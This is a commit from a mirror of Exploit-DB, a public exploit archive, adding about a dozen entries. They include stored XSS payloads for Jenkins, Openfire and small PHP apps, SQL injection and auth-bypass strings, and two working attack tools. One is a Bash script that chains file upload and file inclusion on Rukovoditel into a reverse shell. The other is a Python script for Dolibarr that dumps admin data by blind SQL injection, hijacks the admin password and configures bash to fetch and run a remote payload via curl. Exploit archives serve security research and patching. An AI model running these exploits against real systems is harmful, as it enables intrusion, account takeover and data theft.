bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-12-12

Browse source 
12 changes to exploits/shellcodes

Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass
Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)
Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)
Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting
Openfire 4.6.0 - 'groupchatJID' Stored XSS
Openfire 4.6.0 - 'users' Stored XSS
Openfire 4.6.0 - 'sql' Stored XSS
Medical Center Portal Management System 1.0 - Multiple Stored XSS
Jenkins 2.235.3 - 'Description' Stored XSS
Rukovoditel 2.6.1 - RCE
Supply Chain Management System - Auth Bypass SQL Injection
Dolibarr 12.0.3 - SQLi to RCE
Courier Management System 1.0 - 'First Name' Stored XSS
Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection
Courier Management System 1.0 - 'ref_no' SQL Injection
This commit is contained in:
Offensive Security 2020-12-12 05:01:57 +00:00
parent 42b9ff04f0
commit fc0129fabf
13 changed files with 823 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

62
exploits/java/webapps/49232.txt Normal file
View file

@ -0,0 +1,62 @@
# Exploit Title: Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE : CVE-2020-2229
# References:
https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955
https://www.openwall.com/lists/oss-security/2020/08/12/4
Vendor Description:
Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the tooltip content of help icons.
Tooltip values can be contributed by plugins, some of which use user-specified values.
This results in a stored cross-site scripting (XSS) vulnerability.
Jenkins 2.252, LTS 2.235.4 escapes the tooltip content of help icons.
Technical Details and Exploitation:
As it is possible to observe from patch commit:
https://github.com/jenkinsci/jenkins/pull/4918/commits/c991b45b5bae09f9894acdc1f1fb1d8809fe6ef6
The fix to solve the vulnerability is applied to 'core/src/main/resources/lib/layout/svgIcon.jelly' tooltip attribute:
<svg class="svg-icon ${attrs.class}"
viewBox="${attrs.viewBox != null ? attrs.viewBox : '0 0 24 24'}"
focusable="${attrs.focusable != null ? attrs.focusable : 'false'}"
aria-hidden="${attrs.ariaHidden != null ? attrs.ariaHidden : ''}"
style="${attrs.style}"
onclick="${attrs.onclick}"
tooltip="${h.xmlEscape(attrs.tooltip ?: '')}">
svgIcon is a layout element belonging to jenkins core: https://reports.jenkins.io/core-taglib/jelly-taglib-ref.html#layout:svgIcon
As suggested by Jenkins documentation (https://www.jenkins.io/doc/developer/security/xss-prevention/)
"Note that this only affects the use of ${...} among PCDATA, and not in attribute values, so that Jelly tag invocations dont result in surprising behavior."
Tooltip attribute can contain HTML code, as suggested in form section: https://www.jenkins.io/doc/developer/forms/adding-tool-tips/
For this reason, it is possible to inject XSS code in a Jenkins system by uploading a plugin that contains an <j:svgIcon> element containing a malicious XSS payload in tooltip attribute:
<l:svgIcon tooltip="<img src=a onerror=alert(1)>">...</l:svgIcon>
To build a Jenkins plugin, visit https://www.jenkins.io/doc/developer/tutorial/create/ .
To obtain information about Jelly syntax, visit https://wiki.jenkins.io/display/JENKINS/Basic+guide+to+Jelly+usage+in+Jenkins
Proof Of Concept:
1. Obtain access to upload Jenkins plugins, or find plugins that can insert svgIcon element.
2. Generate a plugin. For example, you can create a class that implements ModelObjectWithContextMenu interface to create a context menu and implement the method getUrlName()
containing a <plugin-url> string that you can navigate by using the link: http(s)://<jenkins_server>/<plugin-url>
3. In jelly file, insert the following element:
<l:svgIcon tooltip="<img src=a onerror=alert(1)>"><path d="M9 16.17L4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z"></path></l:svgIcon>
This creates an icon that triggers the Cross-Site Scripting when the mouse is over and opens tooltip. Obviously, you can use css and large size and height to generate a svg element that covers all the screen in order to trigger the XSS when the user navigates the page.
Solution:
The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4

79
exploits/java/webapps/49237.txt Normal file
View file

@ -0,0 +1,79 @@
# Exploit Title: Jenkins 2.235.3 - 'Description' Stored XSS
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE : CVE-2020-2230
# References:
https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1957
https://www.openwall.com/lists/oss-security/2020/08/12/4
Vendor Description:
Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the project naming strategy description that is displayed on item creation.
This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Overall/Manage permission.
Jenkins 2.252, LTS 2.235.4 escapes the project naming strategy description.
Technical Details and Exploitation:
As it is possible to observe from patch commit:
https://github.com/jenkinsci/jenkins/pull/4918/commits/7529ce8905910849e890b7e26d6563e0d56189d2
The fix to solve the vulnerability is applied in activateValidationMessage function to 'war/src/main/js/add-item.js' javascript file:
function activateValidationMessage(messageId, context, message) {
...
$(messageId, context).html('&#187; ' + message); // AFTER FIX: $(messageId, context).text('» ' + message);
...
}
The function is called during the creation of a new Item, on "blur input" event (when text element of name input is focused):
$('input[name="name"]', '#createItem').on("blur input", function() {
if (!isItemNameEmpty()) {
var itemName = $('input[name="name"]', '#createItem').val();
$.get("checkJobName", { value: itemName }).done(function(data) {
var message = parseResponseFromCheckJobName(data);
if (message !== '') {
activateValidationMessage('#itemname-invalid', '.add-item-name', message); // INJECTION HERE
} else {
cleanValidationMessages('.add-item-name');
showInputHelp('.add-item-name');
setFieldValidationStatus('name', true);
if (getFormValidationStatus()) {
enableSubmit(true);
}
}
});
} else {
....
activateValidationMessage('#itemname-required', '.add-item-name');
}
});
as "message" param is the injection point, we need to trigger an "invalid item name": when you are creating a new item and the name is not compliant with validation rules, an error is triggered. Error message is not escaped for vulnerable versions, so it is vulnerable to XSS.
Validation rules can trigger an error in several ways, for example:
- if the current item name is equal to an already existent item name;
- if a project naming strategy is defined: in this case, if the project name is not compliant with a regex strategy, a error message is shown.
In the first case Jenkins seems to be protected because when a new project is created, it is not possible to insert malicious characters (such as <,>).
In the second case, the error message also shows a description, that can be provided by the user during the regex strategy creation. In description field, it is possible to inject malicious characters, so it is possible to insert an XSS payload in description field.
When the user insert a name that is not compliant with project naming strategy, the XSS is triggered.
Proof Of Concept:
1. In <jenkins_url>/configure create a new Project Naming Strategy (enable checkbox "Restrict project naming") containing the following values:
Pattern: ^TEST.*
Description: GX1h4ck <img src=a onerror=alert(1)>
2. Go to New element creation section (/<jenkins_url>/jenkins/view/all/newJob).
When you insert a character in the name field, alert is triggered.
Solution:
The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4

30
exploits/jsp/webapps/49233.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Openfire 4.6.0 - 'groupchatJID' Stored XSS
# Date: 2020/12/11
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0
POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101
Firefox/68.0
Content-Length: 144
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn
Origin: http://192.168.137.137:9090
Referer:
http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=%22%3E%3CsCrIpT%3Evkhewwrqrb%3C%2FsCrIpT%3E&groupchatName=&groups=&type=groupchat&users=
Vulnerable parametersgroupchatJID
payload"><ScRiPt>alert(document.cookie)</ScRiPt>

28
exploits/jsp/webapps/49234.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Openfire 4.6.0 - 'users' Stored XSS
# Date: 2020/12/11
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0
POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Length: 144
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=&groupchatName=&groups=&type=groupchat&users=%22%3E%3CScRiPt%3Ekcxbfhabog%3C%2FsCrIpT%3E
Vulnerable parametersusers
payload"><ScRiPt>alert(document.cookie)</ScRiPt>

30
exploits/jsp/webapps/49235.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Openfire 4.6.0 - 'sql' Stored XSS
# Date: 20201211
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0
POST /plugins/dbaccess/db-access.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101
Firefox/68.0
Content-Length: 78
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
csrf=zsq8G2h1dxK9JST; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn;
jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/dbaccess/db-access.jsp
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
execute=Execute+SQL&sql=%3C%2FTeXtArEa%3E%3CsCrIpT%3Etkfbrxuddq%3C%2FScRiPt%3E
Vulnerable parameterssql
payload"><ScRiPt>alert(document.cookie)</ScRiPt>

26
exploits/php/webapps/49236.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: Medical Center Portal Management System 1.0 - Multiple Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-10
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS
Step 1: Log in to the application with any valid user credentials.
Step 2: Click on "Medical Products", select "Add Medical Products", use
"<scrip>alert(1)</script>" in both name ad description fields. Complete the
other fields and save product.
Step 3: Once you click on save, this should trigger the XSS payload.
clicking on the "Medical Products" page anytime will trigger the Stored XSS
Payload
Note: Same method applies to "Add New Hospital | Pharmacy page"
Step 1: Use "<scrip>alert("r0b0tG4nG")</script>" as hospital/pharmacy name,
fill the other required information and click on save. Your payload will be
executed anytime you click on "Medical Products" page or "Add New Hospital
| Pharmacy page" page.

77
exploits/php/webapps/49238.sh Executable file
View file

@ -0,0 +1,77 @@
# Exploit Title: Rukovoditel 2.6.1 - RCE
# Date: 2020-06-11
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c1010
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
set -e
function usage () {
echo "NAME: Rukovoditel v2.6.1, RCE"
echo "SYNOPSIS: ./rce_2.6.1.sh <BASE_URL> <SID>"
echo "DESCRIPTION:"
echo "Upload file test.php on the remote server and trigger the file using a LFI"
echo "AUTHOR: coiffeur"
exit
}
if [ "$#" -ne 2 ]; then
usage
fi
BASE_URL=$1
SID=$2
echo "Setting target: $BASE_URL"
echo "Setting sid: $SID"
echo ""
echo "Extracting \$app_user['id']:"
APP_USER_ID=`curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID" | grep "validate_form&id=" | cut -d '=' -f 3 | cut -d "'" -f 1`
echo " => \$app_user['id']: $APP_USER_ID"
echo "Setting arbitrary \$_POST['timestamp']:"
TIMESTAMP=1337
echo " => \$_POST['timestamp']: 1337"
echo "Calculating \$verifyToken:"
VERIFY_TOKEN=`echo -n "$APP_USER_ID$TIMESTAMP" | md5sum | cut -d ' ' -f 1=`
echo " => \$verifyToken: $VERIFY_TOKEN"
echo ""
echo "[*] Trying to upload test.php ... (Arbitrary File Upload)"
curl "$BASE_URL/index.php?module=users/account&action=attachments_upload" -H "Cookie: sid=$SID" -F "timestamp=$TIMESTAMP" -F "token=$VERIFY_TOKEN" -F 'Filedata=@test.php'
echo ""
echo "[*] Trying to recover time() output:"
TIME=$(date -d "`curl -si "$BASE_URL" | grep "Date:" | sed 's/Date: //'`"= +%s)
echo " => timestamp: $TIME"
echo "[*] Trying to recover the generated filename:"=20
FILENAME=` echo -n $TIME"_test.php" | sha1sum | cut -d ' ' -f 1`
echo " => filename: $FILENAME"
echo "[*] Trying to reconstructing full path:"
DATE=`date +"%Y/%m/%d"`
FULL_PATH=`echo -n "uploads/attachments/$DATE/$FILENAME"`
echo " => full path: $FULL_PATH"
echo ""
echo "[!] Prepare a netcat listener by typing: nc -lvp 4444"
echo ""
echo "[*] Trying to update language settings ... (Local File Inclusion)"
LANGUAGE="../../$FULL_PATH"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=$LANGUAGE"
echo "[*] Triggering reverse shell ..."
curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID="
echo "[*] Restoring default language settings"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=english.php"
echo "> Done"

21
exploits/php/webapps/49239.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection
# Date: 2020-12-11
# Exploit Author: Piyush Malviya
# Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14619&title=Supply+Chain+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Tested On: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4
#Vulnerable Page: Login Page
#Exploit
Open the Application
check the URL: http://localhost/scm-master/
Open Login Page
Enter username: ' or 0=0 #
Enter password: '
Select Login Type: Admin
click on login
The SQL payload gets executed and authentication is bypassed successfully

368
exploits/php/webapps/49240.py Executable file
View file

@ -0,0 +1,368 @@
# Exploit Title: Dolibarr 12.0.3 - SQLi to RCE
# Date: 2/12/2020
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/
# Version: 12.0.3
import argparse
import binascii
import random
import re
from io import BytesIO
from urllib.parse import quote_plus as qp
import bcrypt
import pytesseract
import requests
from bs4 import BeautifulSoup
from PIL import Image
DELTA = None
DEBUG = 1
SESSION = requests.session()
TRESHOLD = 0.80
DELAY = 1
LIKE = "%_subscription"
COLUMNS = ["login", "pass_temp"]
def usage():
banner = """NAME: Dolibarr SQLi to RCE (authenticate)
SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PAS=
SWORD>
EXAMPLE:
python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12=
.0.3/htdocs/" -u test -p test
AUTHOR: coiffeur
"""
print(banner)
exit(-1)
def hex(text):
return "0x" + binascii.hexlify(text.encode()).decode()
def hash(password):
salt = bcrypt.gensalt()
hashed = bcrypt.hashpw(password.encode(), salt)
return hashed.decode()
def authenticate(url, username, password):
datas = {
"actionlogin": "login",
"loginfunction": "loginfunction",
"username": username,
"password": password
}
r = SESSION.post(f"{url}index.php", data=datas,
allow_redirects=False, verify=False)
if r.status_code != 302:
if DEBUG:
print(f"[x] Authentication failed!")
return 0
if DEBUG:
print(f" [*] Authenticated as: {username}")
return 1
def get_antispam_code(base_url):
code = ""
while len(code) != 5:
r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False)
temp_image = f"/tmp/{random.randint(0000,9999)}"
with open(temp_image, "wb") as f:
f.write(r.content)
with open(temp_image, "rb") as f:
code = pytesseract.image_to_string(
Image.open(BytesIO(f.read()))).split("\n")[0]
for char in code:
if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679":
code = ""
break
return code
def reset_password(url, login):
for _ in range(5):
code = get_antispam_code(url)
headers = {
"Referer": f"{url}user/passwordforgotten.php"
}
datas = {
"action": "buildnewpassword",
"username": login,
"code": code
}
r = SESSION.post(url=f"{url}user/passwordforgotten.php",
data=datas, headers=headers, verify=False)
if r.status_code == 200:
for response in [f"Request to change password for {login} sent =
to", f"Demande de changement de mot de passe pour {login} envoy=C3=A9e"]:
if r.text.find(response):
if DEBUG:
print(f" [*] Password reset using code: {code}")
return 1
return 0
def change_password(url, login, pass_temp):
r = requests.get(url=f"{url}user/passwordforgotten.php?action=val=
idatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}",
allow_redirects=False, verify=False)
if r.status_code == 302:
if DEBUG:
print(f" [*] Password changed: {pass_temp}")
return 1
return 0
def change_binary(url, command, parameters):
headers = {
"Referer": f"{url}admin/security_file.php"
}
datas = {
"action": "updateform",
"MAIN_UPLOAD_DOC": "2048",
"MAIN_UMASK": "0664",
"MAIN_ANTIVIRUS_COMMAND": command,
"MAIN_ANTIVIRUS_PARAM": parameters
}
r = SESSION.post(url=f"{url}admin/security_file.php",
data=datas, headers=headers, verify=False)
if r.status_code == 200:
for response in ["Record modified successfully", "Enregistrement mo=
difi=C3=A9 avec succ=C3=A8s"]:
if response in r.text:
if DEBUG:
print(f" [*] Binary's path changed")
return 1
return 0
def trigger_exploit(url):
headers = {
"Referer": f"{url}admin/security_file.php"
}
files = {
"userfile[]": open("junk.txt", "rb"),
}
datas = {
"sendit": "Upload"
}
if DEBUG:
print(f" [*] Triggering reverse shell")
r = SESSION.post(url=f"{url}admin/security_file.php",
files=files, data=datas, headers=headers, verify=False)
if r.status_code == 200:
for response in ["File(s) uploaded successfully", "The antivirus pr=
ogram was not able to validate the file (file might be infected by a virus)=
", "Fichier(s) t=C3=A9l=C3=A9vers=C3=A9s(s) avec succ=C3=A8s", "L'antivirus=
n'a pas pu valider ce fichier (il est probablement infect=C3=A9 par un vir=
us) !"]:
if response in r.text:
if DEBUG:
print(f" [*] Exploit done")
return 1
return 0
def get_version(url):
r = SESSION.get(f"{url}index.php", verify=False)
x = re.findall(
r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text)
if x:
version = x[0]
if "12.0.3" in version:
if DEBUG:
print(f" [*] {version} (exploit should work)")
return 1
if DEBUG:
print(f"[*] Version may not be vulnerable")
return 0
def get_privileges(url):
r = SESSION.get(f"{url}index.php", verify=False)
x = re.findall(r"id=\d", r.text)
if x:
id = x[0]
if DEBUG:
print(f" [*] id found: {id}")
r = SESSION.get(f"{url}user/perms.php?{id}", verify=False)
soup = BeautifulSoup(r.text, 'html.parser')
for img in soup.find_all("img"):
if img.get("title") in ["Actif", "Active"]:
for td in img.parent.parent.find_all("td"):
privileges = [
"Consulter les commandes clients", "Read customers =
orders"]
for privilege in privileges:
if privilege in td:
if DEBUG:
print(
f" [*] Check privileges: {privilege}=
")
return 1
if DEBUG:
print(f"[*] At the sight of the privileges, the exploit may fail")
return 0
def check(url, payload):
headers = {
"Referer": f"{url}commande/stats/index.php?leftmenu=orders"
}
datas = {"object_status": payload}
r = SESSION.post(url=f"{url}commande/stats/index.php",
data=datas, headers=headers, verify=False)
return r.elapsed.total_seconds()
def evaluate_delay(url):
global DELTA
deltas = []
payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
for _ in range(4):
deltas.append(check(url, payload))
DELTA = sum(deltas)/len(deltas)
if DEBUG:
print(f" [+] Delta: {DELTA}")
def get_tbl_name_len(url):
i = 0
while 1:
payload = f"IF((SELECT LENGTH(table_name) FROM information_schema=
.tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))"
if check(url, payload) >= DELTA*TRESHOLD:
return i
if i > 100:
print(f"[x] Exploit failed")
exit(-1)
i += 1
def get_tbl_name(url, length):
tbl_name = ""
for i in range(1, length+1):
min, max = 0, 127-1
while min < max:
mid = (max + min) // 2
payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM i=
nformation_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP=
({DELAY}), SLEEP(0))"
if check(url, payload) >= DELTA*TRESHOLD:
max = mid
else:
min = mid + 1
tbl_name += chr(min)
return tbl_name
def get_elt_len(url, tbl_name, column_name):
i = 0
while 1:
payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMI=
T 1)>{i}, SLEEP(0), SLEEP({DELAY}))"
if check(url, payload) >= DELTA*TRESHOLD:
return i
if i > 100:
print(f"[x] Exploit failed")
exit(-1)
i += 1
def get_elt(url, tbl_name, column_name, length):
elt = ""
for i in range(1, length+1):
min, max = 0, 127-1
while min < max:
mid = (max + min) // 2
payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FRO=
M {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))"
if check(url, payload) >= DELTA*TRESHOLD:
max = mid
else:
min = mid + 1
elt += chr(min)
return elt
def get_row(url, tbl_name):
print(f" [*] Dump admin's infos from {tbl_name}")
infos = {}
for column_name in COLUMNS:
elt_length = get_elt_len(url, tbl_name, column_name)
infos[column_name] = get_elt(url, tbl_name, column_name, elt_leng=
th)
if DEBUG:
print(f" [+] Infos: {infos}")
return infos
def main(url, username, password):
# Check if exploit is possible
print(f"[*] Requirements:")
if not authenticate(url, username, password):
print(f"[x] Exploit failed!")
exit(-1)
get_version(url)
get_privileges(url)
print(f"\n[*] Starting exploit:")
# Evaluate delay
evaluate_delay(url)
print(f" [*] Extract prefix (using table: {LIKE})")
tbl_name_len = get_tbl_name_len(url)
tbl_name = get_tbl_name(url, tbl_name_len)
prefix = f"{tbl_name.split('_')[0]}_"
if DEBUG:
print(f" [+] Prefix: {prefix}")
# Dump admin's infos
user_table_name = f"{prefix}user"
infos = get_row(url, user_table_name)
if not infos["login"]:
print(f"[x] Exploit failed!")
exit(-1)
# Reset admin's passworrd
if DEBUG:
print(f" [*] Reseting {infos['login']}'s password")
if not reset_password(url, infos["login"]):
print(f"[x] Exploit failed!")
exit(-1)
infos = get_row(url, user_table_name)
# Remove cookies to logout
# Change admin's password
# Login as admin
SESSION.cookies.clear()
if not change_password(url, infos['login'], infos['pass_temp']):
print(f"[x] Exploit failed!")
exit(-1)
authenticate(url, infos['login'], infos['pass_temp'])
# Change antivirus's binary path
# Trigger reverse shell
change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"'=
)
trigger_exploit(url)
return 0
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-t", help="Base URL of Dolibarr")
parser.add_argument("-u", help="Username")
parser.add_argument("-p", help="Password")
args = parser.parse_args()
if not args.t or not args.u or not args.p:
usage()
main(args.t, args.u, args.p)

15
exploits/php/webapps/49241.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Courier Management System 1.0 - 'First Name' Stored XSS
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on the logged in username on header and select Manage Account.
Step 3: Rename the user First Name or Last Name to
"<script>alert(1111)</script>".
Step 4: Update Profile and this will trigger the XSS.
Step 5: Logout and login again and the page will display the domain name.

50
exploits/php/webapps/49242.txt Normal file
View file

@ -0,0 +1,50 @@
# Exploit Title: Courier Management System 1.0 - 'MULTIPART street ' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form , click on save
Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page in burpsute
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all databases contents
---
Parameter: MULTIPART street ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="id"
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="street"
11111111111' AND (SELECT 8687 FROM (SELECT(SLEEP(5)))XZFt) AND 'OQNu'='OQNu
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="city"
111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="state"
1111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="zip_code"
11111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="country"
1111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="contact"
111111111
-----------------------------12317926718649295872939507245--
---

23
exploits/php/webapps/49243.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Courier Management System 1.0 - 'ref_no' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form , click on save
Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page inburpsute
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all databases contents
---
Parameter: ref_no (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND
'knst'='knst
---

16
files_exploits.csv
View file

@ -18239,8 +18239,8 @@ id,file,description,date,author,type,platform,port
47531,exploits/multiple/remote/47531.rb,"Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)",2019-10-22,Metasploit,remote,multiple,
47536,exploits/hardware/remote/47536.txt,"Moxa EDR-810 - Command Injection / Information Disclosure",2019-10-22,RandoriSec,remote,hardware,
47554,exploits/windows/remote/47554.py,"Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow",2019-10-29,"Lance Biggerstaff",remote,windows,
47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution",2019-10-29,"Thomas Zuk",remote,windows,
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows,
47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)",2019-10-29,"Thomas Zuk",remote,windows,
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)",2019-10-29,"Thomas Zuk",remote,windows,
